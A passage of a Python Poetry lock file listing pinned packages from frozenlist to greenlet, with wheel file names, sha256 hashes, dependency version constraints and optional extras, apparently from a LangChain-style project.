"frozenlist-1.4.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:9ac08e601308e41eb533f232dbf6b7e4cea762f9f84f6357136eed926c15d12c"}, {file = "frozenlist-1.4.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d081f13b095d74b67d550de04df1c756831f3b83dc9881c38985834387487f1b"}, {file = "frozenlist-1.4.0-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:71932b597f9895f011f47f17d6428252fc728ba2ae6024e13c3398a087c2cdea"}, {file = "frozenlist-1.4.0-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:981b9ab5a0a3178ff413bca62526bb784249421c24ad7381e39d67981be2c326"}, {file = "frozenlist-1.4.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:e41f3de4df3e80de75845d3e743b3f1c4c8613c3997a912dbf0229fc61a8b963"}, {file = "frozenlist-1.4.0-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6918d49b1f90821e93069682c06ffde41829c346c66b721e65a5c62b4bab0300"}, {file = "frozenlist-1.4.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:0e5c8764c7829343d919cc2dfc587a8db01c4f70a4ebbc49abde5d4b158b007b"}, {file = "frozenlist-1.4.0-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:8d0edd6b1c7fb94922bf569c9b092ee187a83f03fb1a63076e7774b60f9481a8"}, {file = "frozenlist-1.4.0-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:e29cda763f752553fa14c68fb2195150bfab22b352572cb36c43c47bedba70eb"}, {file = "frozenlist-1.4.0-cp310-cp310-musllinux_1_1_s390x.whl", hash = "sha256:0c7c1b47859ee2cac3846fde1c1dc0f15da6cec5a0e5c72d101e0f83dcb67ff9"}, {file = "frozenlist-1.4.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:901289d524fdd571be1c7be054f48b1f88ce8dddcbdf1ec698b27d4b8b9e5d62"}, {file = "frozenlist-1.4.0-cp310-cp310-win32.whl", hash = "sha256:1a0848b52815006ea6596c395f87449f693dc419061cc21e970f139d466dc0a0"}, {file = "frozenlist-1.4.0-cp310-cp310-win_amd64.whl", hash = "sha256:b206646d176a007466358aa21d85cd8600a415c67c9bd15403336c331a10d956"}, {file = "frozenlist-1.4.0-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:de343e75f40e972bae1ef6090267f8260c1446a1695e77096db6cfa25e759a95"}, {file = "frozenlist-1.4.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:ad2a9eb6d9839ae241701d0918f54c51365a51407fd80f6b8289e2dfca977cc3"}, {file = "frozenlist-1.4.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:bd7bd3b3830247580de99c99ea2a01416dfc3c34471ca1298bccabf86d0ff4dc"}, {file = "frozenlist-1.4.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:bdf1847068c362f16b353163391210269e4f0569a3c166bc6a9f74ccbfc7e839"}, {file = "frozenlist-1.4.0-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:38461d02d66de17455072c9ba981d35f1d2a73024bee7790ac2f9e361ef1cd0c"}, {file = "frozenlist-1.4.0-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:d5a32087d720c608f42caed0ef36d2b3ea61a9d09ee59a5142d6070da9041b8f"}, {file = "frozenlist-1.4.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:dd65632acaf0d47608190a71bfe46b209719bf2beb59507db08ccdbe712f969b"}, {file = "frozenlist-1.4.0-cp311-cp311-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:261b9f5d17cac914531331ff1b1d452125bf5daa05faf73b71d935485b0c510b"}, {file = "frozenlist-1.4.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:b89ac9768b82205936771f8d2eb3ce88503b1556324c9f903e7156669f521472"}, {file = "frozenlist-1.4.0-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:008eb8b31b3ea6896da16c38c1b136cb9fec9e249e77f6211d479db79a4eaf01"}, {file = "frozenlist-1.4.0-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:e74b0506fa5aa5598ac6a975a12aa8928cbb58e1f5ac8360792ef15de1aa848f"}, {file = "frozenlist-1.4.0-cp311-cp311-musllinux_1_1_s390x.whl", hash = "sha256:490132667476f6781b4c9458298b0c1cddf237488abd228b0b3650e5ecba7467"}, {file = "frozenlist-1.4.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:76d4711f6f6d08551a7e9ef28c722f4a50dd0fc204c56b4bcd95c6cc05ce6fbb"}, {file = "frozenlist-1.4.0-cp311-cp311-win32.whl", hash = "sha256:a02eb8ab2b8f200179b5f62b59757685ae9987996ae549ccf30f983f40602431"}, {file = "frozenlist-1.4.0-cp311-cp311-win_amd64.whl", hash = "sha256:515e1abc578dd3b275d6a5114030b1330ba044ffba03f94091842852f806f1c1"}, {file = "frozenlist-1.4.0-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:f0ed05f5079c708fe74bf9027e95125334b6978bf07fd5ab923e9e55e5fbb9d3"}, {file = "frozenlist-1.4.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:ca265542ca427bf97aed183c1676e2a9c66942e822b14dc6e5f42e038f92a503"}, {file = "frozenlist-1.4.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:491e014f5c43656da08958808588cc6c016847b4360e327a62cb308c791bd2d9"}, {file = "frozenlist-1.4.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:17ae5cd0f333f94f2e03aaf140bb762c64783935cc764ff9c82dff626089bebf"}, {file = "frozenlist-1.4.0-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:1e78fb68cf9c1a6aa4a9a12e960a5c9dfbdb89b3695197aa7064705662515de2"}, {file = "frozenlist-1.4.0-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:d5655a942f5f5d2c9ed93d72148226d75369b4f6952680211972a33e59b1dfdc"}, {file = "frozenlist-1.4.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:c11b0746f5d946fecf750428a95f3e9ebe792c1ee3b1e96eeba145dc631a9672"}, {file = "frozenlist-1.4.0-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e66d2a64d44d50d2543405fb183a21f76b3b5fd16f130f5c99187c3fb4e64919"}, {file = "frozenlist-1.4.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:88f7bc0fcca81f985f78dd0fa68d2c75abf8272b1f5c323ea4a01a4d7a614efc"}, {file = "frozenlist-1.4.0-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:5833593c25ac59ede40ed4de6d67eb42928cca97f26feea219f21d0ed0959b79"}, {file = "frozenlist-1.4.0-cp38-cp38-musllinux_1_1_ppc64le.whl", hash = "sha256:fec520865f42e5c7f050c2a79038897b1c7d1595e907a9e08e3353293ffc948e"}, {file = "frozenlist-1.4.0-cp38-cp38-musllinux_1_1_s390x.whl", hash = "sha256:b826d97e4276750beca7c8f0f1a4938892697a6bcd8ec8217b3312dad6982781"}, {file = "frozenlist-1.4.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:ceb6ec0a10c65540421e20ebd29083c50e6d1143278746a4ef6bcf6153171eb8"}, {file = "frozenlist-1.4.0-cp38-cp38-win32.whl", hash = "sha256:2b8bcf994563466db019fab287ff390fffbfdb4f905fc77bc1c1d604b1c689cc"}, {file = "frozenlist-1.4.0-cp38-cp38-win_amd64.whl", hash = "sha256:a6c8097e01886188e5be3e6b14e94ab365f384736aa1fca6a0b9e35bd4a30bc7"}, {file = "frozenlist-1.4.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:6c38721585f285203e4b4132a352eb3daa19121a035f3182e08e437cface44bf"}, {file = "frozenlist-1.4.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:a0c6da9aee33ff0b1a451e867da0c1f47408112b3391dd43133838339e410963"}, {file = "frozenlist-1.4.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:93ea75c050c5bb3d98016b4ba2497851eadf0ac154d88a67d7a6816206f6fa7f"}, {file = "frozenlist-1.4.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f61e2dc5ad442c52b4887f1fdc112f97caeff4d9e6ebe78879364ac59f1663e1"}, {file = "frozenlist-1.4.0-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:aa384489fefeb62321b238e64c07ef48398fe80f9e1e6afeff22e140e0850eef"}, {file = "frozenlist-1.4.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:10ff5faaa22786315ef57097a279b833ecab1a0bfb07d604c9cbb1c4cdc2ed87"}, {file = "frozenlist-1.4.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:007df07a6e3eb3e33e9a1fe6a9db7af152bbd8a185f9aaa6ece10a3529e3e1c6"}, {file = "frozenlist-1.4.0-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7f4f399d28478d1f604c2ff9119907af9726aed73680e5ed1ca634d377abb087"}, {file = "frozenlist-1.4.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:c5374b80521d3d3f2ec5572e05adc94601985cc526fb276d0c8574a6d749f1b3"}, {file = "frozenlist-1.4.0-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:ce31ae3e19f3c902de379cf1323d90c649425b86de7bbdf82871b8a2a0615f3d"}, {file = "frozenlist-1.4.0-cp39-cp39-musllinux_1_1_ppc64le.whl", hash = "sha256:7211ef110a9194b6042449431e08c4d80c0481e5891e58d429df5899690511c2"}, {file = "frozenlist-1.4.0-cp39-cp39-musllinux_1_1_s390x.whl", hash = "sha256:556de4430ce324c836789fa4560ca62d1591d2538b8ceb0b4f68fb7b2384a27a"}, {file = "frozenlist-1.4.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:7645a8e814a3ee34a89c4a372011dcd817964ce8cb273c8ed6119d706e9613e3"}, {file = "frozenlist-1.4.0-cp39-cp39-win32.whl", hash = "sha256:19488c57c12d4e8095a922f328df3f179c820c212940a498623ed39160bc3c2f"}, {file = "frozenlist-1.4.0-cp39-cp39-win_amd64.whl", hash = "sha256:6221d84d463fb110bdd7619b69cb43878a11d51cbb9394ae3105d082d5199167"}, {file = "frozenlist-1.4.0.tar.gz", hash = "sha256:09163bdf0b2907454042edb19f887c6d33806adc71fbd54afc14908bfdc22251"}, ] [[package]] name = "fsspec" version = "2023.10.0" description = "File-system specification" optional = true python-versions = ">=3.8" files = [ {file = "fsspec-2023.10.0-py3-none-any.whl", hash = "sha256:346a8f024efeb749d2a5fca7ba8854474b1ff9af7c3faaf636a4548781136529"}, {file = "fsspec-2023.10.0.tar.gz", hash = "sha256:330c66757591df346ad3091a53bd907e15348c2ba17d63fd54f5c39c4457d2a5"}, ] [package.extras] abfs = ["adlfs"] adl = ["adlfs"] arrow = ["pyarrow (>=1)"] dask = ["dask", "distributed"] devel = ["pytest", "pytest-cov"] dropbox = ["dropbox", "dropboxdrivefs", "requests"] full = ["adlfs", "aiohttp (!=4.0.0a0,!=4.0.0a1)", "dask", "distributed", "dropbox", "dropboxdrivefs", "fusepy", "gcsfs", "libarchive-c", "ocifs", "panel", "paramiko", "pyarrow (>=1)", "pygit2", "requests", "s3fs", "smbprotocol", "tqdm"] fuse = ["fusepy"] gcs = ["gcsfs"] git = ["pygit2"] github = ["requests"] gs = ["gcsfs"] gui = ["panel"] hdfs = ["pyarrow (>=1)"] http = ["aiohttp (!=4.0.0a0,!=4.0.0a1)", "requests"] libarchive = ["libarchive-c"] oci = ["ocifs"] s3 = ["s3fs"] sftp = ["paramiko"] smb = ["smbprotocol"] ssh = ["paramiko"] tqdm = ["tqdm"] [[package]] name = "future" version = "0.18.3" description = "Clean single-source support for Python 3 and 2" optional = true python-versions = ">=2.6, !=3.0.*, !=3.1.*, !=3.2.*" files = [ {file = "future-0.18.3.tar.gz", hash = "sha256:34a17436ed1e96697a86f9de3d15a3b0be01d8bc8de9c1dffd59fb8234ed5307"}, ] [[package]] name = "gast" version = "0.4.0" description = "Python AST that abstracts the underlying Python version" optional = true python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*" files = [ {file = "gast-0.4.0-py3-none-any.whl", hash = "sha256:b7adcdd5adbebf1adf17378da5ba3f543684dbec47b1cda1f3997e573cd542c4"}, {file = "gast-0.4.0.tar.gz", hash = "sha256:40feb7b8b8434785585ab224d1568b857edb18297e5a3047f1ba012bc83b42c1"}, ] [[package]] name = "geojson" version = "2.5.0" description = "Python bindings and utilities for GeoJSON" optional = true python-versions = "*" files = [ {file = "geojson-2.5.0-py2.py3-none-any.whl", hash = "sha256:ccbd13368dd728f4e4f13ffe6aaf725b6e802c692ba0dde628be475040c534ba"}, {file = "geojson-2.5.0.tar.gz", hash = "sha256:6e4bb7ace4226a45d9c8c8b1348b3fc43540658359f93c3f7e03efa9f15f658a"}, ] [[package]] name = "geomet" version = "0.2.1.post1" description = "GeoJSON <-> WKT/WKB conversion utilities" optional = false python-versions = ">2.6, !=3.3.*, <4" files = [ {file = "geomet-0.2.1.post1-py3-none-any.whl", hash = "sha256:a41a1e336b381416d6cbed7f1745c848e91defaa4d4c1bdc1312732e46ffad2b"}, {file = "geomet-0.2.1.post1.tar.gz", hash = "sha256:91d754f7c298cbfcabd3befdb69c641c27fe75e808b27aa55028605761d17e95"}, ] [package.dependencies] click = "*" six = "*" [[package]] name = "geopandas" version = "0.13.2" description = "Geographic pandas extensions" optional = true python-versions = ">=3.8" files = [ {file = "geopandas-0.13.2-py3-none-any.whl", hash = "sha256:101cfd0de54bcf9e287a55b5ea17ebe0db53a5e25a28bacf100143d0507cabd9"}, {file = "geopandas-0.13.2.tar.gz", hash = "sha256:e5b56d9c20800c77bcc0c914db3f27447a37b23b2cd892be543f5001a694a968"}, ] [package.dependencies] fiona = ">=1.8.19" packaging = "*" pandas = ">=1.1.0" pyproj = ">=3.0.1" shapely = ">=1.7.1" [[package]] name = "gitdb" version = "4.0.11" description = "Git Object Database" optional = true python-versions = ">=3.7" files = [ {file = "gitdb-4.0.11-py3-none-any.whl", hash = "sha256:81a3407ddd2ee8df444cbacea00e2d038e40150acfa3001696fe0dcf1d3adfa4"}, {file = "gitdb-4.0.11.tar.gz", hash = "sha256:bf5421126136d6d0af55bc1e7c1af1c397a34f5b7bd79e776cd3e89785c2b04b"}, ] [package.dependencies] smmap = ">=3.0.1,<6" [[package]] name = "gitpython" version = "3.1.40" description = "GitPython is a Python library used to interact with Git repositories" optional = true python-versions = ">=3.7" files = [ {file = "GitPython-3.1.40-py3-none-any.whl", hash = "sha256:cf14627d5a8049ffbf49915732e5eddbe8134c3bdb9d476e6182b676fc573f8a"}, {file = "GitPython-3.1.40.tar.gz", hash = "sha256:22b126e9ffb671fdd0c129796343a02bf67bf2994b35449ffc9321aa755e18a4"}, ] [package.dependencies] gitdb = ">=4.0.1,<5" [package.extras] test = ["black", "coverage[toml]", "ddt (>=1.1.1,!=1.4.3)", "mock", "mypy", "pre-commit", "pytest", "pytest-cov", "pytest-instafail", "pytest-subtests", "pytest-sugar"] [[package]] name = "google-api-core" version = "1.34.0" description = "Google API client core library" optional = true python-versions = ">=3.7" files = [ {file = "google-api-core-1.34.0.tar.gz", hash = "sha256:6fb380f49d19ee1d09a9722d0379042b7edb06c0112e4796c7a395078a043e71"}, {file = "google_api_core-1.34.0-py3-none-any.whl", hash = "sha256:7421474c39d396a74dfa317dddbc69188f2336835f526087c7648f91105e32ff"}, ] [package.dependencies] google-auth = ">=1.25.0,<3.0dev" googleapis-common-protos = ">=1.56.2,<2.0dev" grpcio = {version = ">=1.33.2,<2.0dev", optional = true, markers = "extra == \"grpc\""} grpcio-status = {version = ">=1.33.2,<2.0dev", optional = true, markers = "extra == \"grpc\""} protobuf = ">=3.19.5,<3.20.0 || >3.20.0,<3.20.1 || >3.20.1,<4.0.0dev" requests = ">=2.18.0,<3.0.0dev" [package.extras] grpc = ["grpcio (>=1.33.2,<2.0dev)", "grpcio-status (>=1.33.2,<2.0dev)"] grpcgcp = ["grpcio-gcp (>=0.2.2,<1.0dev)"] grpcio-gcp = ["grpcio-gcp (>=0.2.2,<1.0dev)"] [[package]] name = "google-api-core" version = "2.12.0" description = "Google API client core library" optional = true python-versions = ">=3.7" files = [ {file = "google-api-core-2.12.0.tar.gz", hash = "sha256:c22e01b1e3c4dcd90998494879612c38d0a3411d1f7b679eb89e2abe3ce1f553"}, {file = "google_api_core-2.12.0-py3-none-any.whl", hash = "sha256:ec6054f7d64ad13b41e43d96f735acbd763b0f3b695dabaa2d579673f6a6e160"}, ] [package.dependencies] google-auth = ">=2.14.1,<3.0.dev0" googleapis-common-protos = ">=1.56.2,<2.0.dev0" grpcio = {version = ">=1.33.2,<2.0dev", optional = true, markers = "python_version < \"3.11\" and extra == \"grpc\""} grpcio-status = {version = ">=1.33.2,<2.0.dev0", optional = true, markers = "python_version < \"3.11\" and extra == \"grpc\""} protobuf = ">=3.19.5,<3.20.0 || >3.20.0,<3.20.1 || >3.20.1,<4.21.0 || >4.21.0,<4.21.1 || >4.21.1,<4.21.2 || >4.21.2,<4.21.3 || >4.21.3,<4.21.4 || >4.21.4,<4.21.5 || >4.21.5,<5.0.0.dev0" requests = ">=2.18.0,<3.0.0.dev0" [package.extras] grpc = ["grpcio (>=1.33.2,<2.0dev)", "grpcio (>=1.49.1,<2.0dev)", "grpcio-status (>=1.33.2,<2.0.dev0)", "grpcio-status (>=1.49.1,<2.0.dev0)"] grpcgcp = ["grpcio-gcp (>=0.2.2,<1.0.dev0)"] grpcio-gcp = ["grpcio-gcp (>=0.2.2,<1.0.dev0)"] [[package]] name = "google-api-python-client" version = "2.70.0" description = "Google API Client Library for Python" optional = true python-versions = ">=3.7" files = [ {file = "google-api-python-client-2.70.0.tar.gz", hash = "sha256:262de094d5a30d337f59e66581019fed45b698c078397ac48dd323c0968236e7"}, {file = "google_api_python_client-2.70.0-py2.py3-none-any.whl", hash = "sha256:67da78956f2bf4b763305cd791aeab250878c1f88f1422aaba4682a608b8e5a4"}, ] [package.dependencies] google-api-core = ">=1.31.5,<2.0.dev0 || >2.3.0,<3.0.0dev" google-auth = ">=1.19.0,<3.0.0dev" google-auth-httplib2 = ">=0.1.0" httplib2 = ">=0.15.0,<1dev" uritemplate = ">=3.0.1,<5" [[package]] name = "google-auth" version = "2.23.3" description = "Google Authentication Library" optional = true python-versions = ">=3.7" files = [ {file = "google-auth-2.23.3.tar.gz", hash = "sha256:6864247895eea5d13b9c57c9e03abb49cb94ce2dc7c58e91cba3248c7477c9e3"}, {file = "google_auth-2.23.3-py2.py3-none-any.whl", hash = "sha256:a8f4608e65c244ead9e0538f181a96c6e11199ec114d41f1d7b1bffa96937bda"}, ] [package.dependencies] cachetools = ">=2.0.0,<6.0" pyasn1-modules = ">=0.2.1" rsa = ">=3.1.4,<5" [package.extras] aiohttp = ["aiohttp (>=3.6.2,<4.0.0.dev0)", "requests (>=2.20.0,<3.0.0.dev0)"] enterprise-cert = ["cryptography (==36.0.2)", "pyopenssl (==22.0.0)"] pyopenssl = ["cryptography (>=38.0.3)", "pyopenssl (>=20.0.0)"] reauth = ["pyu2f (>=0.1.5)"] requests = ["requests (>=2.20.0,<3.0.0.dev0)"] [[package]] name = "google-auth-httplib2" version = "0.1.1" description = "Google Authentication Library: httplib2 transport" optional = true python-versions = "*" files = [ {file = "google-auth-httplib2-0.1.1.tar.gz", hash = "sha256:c64bc555fdc6dd788ea62ecf7bccffcf497bf77244887a3f3d7a5a02f8e3fc29"}, {file = "google_auth_httplib2-0.1.1-py2.py3-none-any.whl", hash = "sha256:42c50900b8e4dcdf8222364d1f0efe32b8421fb6ed72f2613f12f75cc933478c"}, ] [package.dependencies] google-auth = "*" httplib2 = ">=0.19.0" [[package]] name = "google-auth-oauthlib" version = "0.4.6" description = "Google Authentication Library" optional = true python-versions = ">=3.6" files = [ {file = "google-auth-oauthlib-0.4.6.tar.gz", hash = "sha256:a90a072f6993f2c327067bf65270046384cda5a8ecb20b94ea9a687f1f233a7a"}, {file = "google_auth_oauthlib-0.4.6-py2.py3-none-any.whl", hash = "sha256:3f2a6e802eebbb6fb736a370fbf3b055edcb6b52878bf2f26330b5e041316c73"}, ] [package.dependencies] google-auth = ">=1.0.0" requests-oauthlib = ">=0.7.0" [package.extras] tool = ["click (>=6.0.0)"] [[package]] name = "google-cloud-documentai" version = "2.20.1" description = "Google Cloud Documentai API client library" optional = true python-versions = ">=3.7" files = [ {file = "google-cloud-documentai-2.20.1.tar.gz", hash = "sha256:eba90546c80177bab7ee8aa3f4b7b1f89cf3ce9752032e359a15d0fbf2225fb0"}, {file = "google_cloud_documentai-2.20.1-py2.py3-none-any.whl", hash = "sha256:793a2e59c425655c951055810635798b5ef56fed164e35b2bd521e5c30ab279e"}, ] [package.dependencies] google-api-core = {version = ">=1.34.0,<2.0.dev0 || >=2.11.dev0,<3.0.0dev", extras = ["grpc"]} proto-plus = [ {version = ">=1.22.2,<2.0.0dev", markers = "python_version >= \"3.11\""}, {version = ">=1.22.0,<2.0.0dev", markers = "python_version < \"3.11\""}, ] protobuf = ">=3.19.5,<3.20.0 || >3.20.0,<3.20.1 || >3.20.1,<4.21.0 || >4.21.0,<4.21.1 || >4.21.1,<4.21.2 || >4.21.2,<4.21.3 || >4.21.3,<4.21.4 || >4.21.4,<4.21.5 || >4.21.5,<5.0.0dev" [[package]] name = "google-pasta" version = "0.2.0" description = "pasta is an AST-based Python refactoring library" optional = true python-versions = "*" files = [ {file = "google-pasta-0.2.0.tar.gz", hash = "sha256:c9f2c8dfc8f96d0d5808299920721be30c9eec37f2389f28904f454565c8a16e"}, {file = "google_pasta-0.2.0-py2-none-any.whl", hash = "sha256:4612951da876b1a10fe3960d7226f0c7682cf901e16ac06e473b267a5afa8954"}, {file = "google_pasta-0.2.0-py3-none-any.whl", hash = "sha256:b32482794a366b5366a32c92a9a9201b107821889935a02b3e51f6b432ea84ed"}, ] [package.dependencies] six = "*" [[package]] name = "google-search-results" version = "2.4.2" description = "Scrape and search localized results from Google, Bing, Baidu, Yahoo, Yandex, Ebay, Homedepot, youtube at scale using SerpApi.com" optional = true python-versions = ">=3.5" files = [ {file = "google_search_results-2.4.2.tar.gz", hash = "sha256:603a30ecae2af8e600b22635757a6df275dad4b934f975e67878ccd640b78245"}, ] [package.dependencies] requests = "*" [[package]] name = "googleapis-common-protos" version = "1.61.0" description = "Common protobufs used in Google APIs" optional = true python-versions = ">=3.7" files = [ {file = "googleapis-common-protos-1.61.0.tar.gz", hash = "sha256:8a64866a97f6304a7179873a465d6eee97b7a24ec6cfd78e0f575e96b821240b"}, {file = "googleapis_common_protos-1.61.0-py2.py3-none-any.whl", hash = "sha256:22f1915393bb3245343f6efe87f6fe868532efc12aa26b391b15132e1279f1c0"}, ] [package.dependencies] protobuf = ">=3.19.5,<3.20.0 || >3.20.0,<3.20.1 || >3.20.1,<4.21.1 || >4.21.1,<4.21.2 || >4.21.2,<4.21.3 || >4.21.3,<4.21.4 || >4.21.4,<4.21.5 || >4.21.5,<5.0.0.dev0" [package.extras] grpc = ["grpcio (>=1.44.0,<2.0.0.dev0)"] [[package]] name = "gptcache" version = "0.1.42" description = "GPTCache, a powerful caching library that can be used to speed up and lower the cost of chat applications that rely on the LLM service. GPTCache works as a memcache for AIGC applications, similar to how Redis works for traditional applications." optional = true python-versions = ">=3.8.1" files = [ {file = "gptcache-0.1.42-py3-none-any.whl", hash = "sha256:8da93cd9fdc3a1c09aae25b688823b4a5bc28dcfa4522e33617f3f7a9e5b8bb0"}, {file = "gptcache-0.1.42.tar.gz", hash = "sha256:17339c41d992bd47c623c716be3bd915dba2687a0fa52aa4ab4ed9cc7cc2b256"}, ] [package.dependencies] cachetools = "*" numpy = "*" requests = "*" [[package]] name = "gql" version = "3.4.1" description = "GraphQL client for Python" optional = true python-versions = "*" files = [ {file = "gql-3.4.1-py2.py3-none-any.whl", hash = "sha256:315624ca0f4d571ef149d455033ebd35e45c1a13f18a059596aeddcea99135cf"}, {file = "gql-3.4.1.tar.gz", hash = "sha256:11dc5d8715a827f2c2899593439a4f36449db4f0eafa5b1ea63948f8a2f8c545"}, ] [package.dependencies] backoff = ">=1.11.1,<3.0" graphql-core = ">=3.2,<3.3" yarl = ">=1.6,<2.0" [package.extras] aiohttp = ["aiohttp (>=3.7.1,<3.9.0)"] all = ["aiohttp (>=3.7.1,<3.9.0)", "botocore (>=1.21,<2)", "requests (>=2.26,<3)", "requests-toolbelt (>=0.9.1,<1)", "urllib3 (>=1.26,<2)", "websockets (>=10,<11)", "websockets (>=9,<10)"] botocore = ["botocore (>=1.21,<2)"] dev = ["aiofiles", "aiohttp (>=3.7.1,<3.9.0)", "black (==22.3.0)", "botocore (>=1.21,<2)", "check-manifest (>=0.42,<1)", "flake8 (==3.8.1)", "isort (==4.3.21)", "mock (==4.0.2)", "mypy (==0.910)", "parse (==1.15.0)", "pytest (==6.2.5)", "pytest-asyncio (==0.16.0)", "pytest-console-scripts (==1.3.1)", "pytest-cov (==3.0.0)", "requests (>=2.26,<3)", "requests-toolbelt (>=0.9.1,<1)", "sphinx (>=3.0.0,<4)", "sphinx-argparse (==0.2.5)", "sphinx-rtd-theme (>=0.4,<1)", "types-aiofiles", "types-mock", "types-requests", "urllib3 (>=1.26,<2)", "vcrpy (==4.0.2)", "websockets (>=10,<11)", "websockets (>=9,<10)"] requests = ["requests (>=2.26,<3)", "requests-toolbelt (>=0.9.1,<1)", "urllib3 (>=1.26,<2)"] test = ["aiofiles", "aiohttp (>=3.7.1,<3.9.0)", "botocore (>=1.21,<2)", "mock (==4.0.2)", "parse (==1.15.0)", "pytest (==6.2.5)", "pytest-asyncio (==0.16.0)", "pytest-console-scripts (==1.3.1)", "pytest-cov (==3.0.0)", "requests (>=2.26,<3)", "requests-toolbelt (>=0.9.1,<1)", "urllib3 (>=1.26,<2)", "vcrpy (==4.0.2)", "websockets (>=10,<11)", "websockets (>=9,<10)"] test-no-transport = ["aiofiles", "mock (==4.0.2)", "parse (==1.15.0)", "pytest (==6.2.5)", "pytest-asyncio (==0.16.0)", "pytest-console-scripts (==1.3.1)", "pytest-cov (==3.0.0)", "vcrpy (==4.0.2)"] websockets = ["websockets (>=10,<11)", "websockets (>=9,<10)"] [[package]] name = "graphql-core" version = "3.2.3" description = "GraphQL implementation for Python, a port of GraphQL.js, the JavaScript reference implementation for GraphQL." optional = true python-versions = ">=3.6,<4" files = [ {file = "graphql-core-3.2.3.tar.gz", hash = "sha256:06d2aad0ac723e35b1cb47885d3e5c45e956a53bc1b209a9fc5369007fe46676"}, {file = "graphql_core-3.2.3-py3-none-any.whl", hash = "sha256:5766780452bd5ec8ba133f8bf287dc92713e3868ddd83aee4faab9fc3e303dc3"}, ] [[package]] name = "greenlet" version = "3.0.0" description = "Lightweight in-process concurrent programming" optional = false python-versions = ">=3.7" files = [ {file = "greenlet-3.0.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:e09dea87cc91aea5500262993cbd484b41edf8af74f976719dd83fe724644cd6"}, {file = "greenlet-3.0.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f47932c434a3c8d3c86d865443fadc1fbf574e9b11d6650b656e602b1797908a"}, {file = "greenlet-3.0.0-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:bdfaeecf8cc705d35d8e6de324bf58427d7eafb55f67050d8f28053a3d57118c"}, {file = "greenlet-3.0.0-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:6a68d670c8f89ff65c82b936275369e532772eebc027c3be68c6b87ad05ca695"}, {file = "greenlet-3.0.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:38ad562a104cd41e9d4644f46ea37167b93190c6d5e4048fcc4b80d34ecb278f"}, {file = "greenlet-3.0.0-cp310-cp310-manylinux_2_24_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:02a807b2a58d5cdebb07050efe3d7deaf915468d112dfcf5e426d0564aa3aa4a"}, {file = "greenlet-3.0.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:b1660a15a446206c8545edc292ab5c48b91ff732f91b3d3b30d9a915d5ec4779"}, {file = "greenlet-3.0.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:813720bd57e193391dfe26f4871186cf460848b83df7e23e6bef698a7624b4c9"}, {file = "greenlet-3.0.0-cp310-cp310-win_amd64.whl", hash = 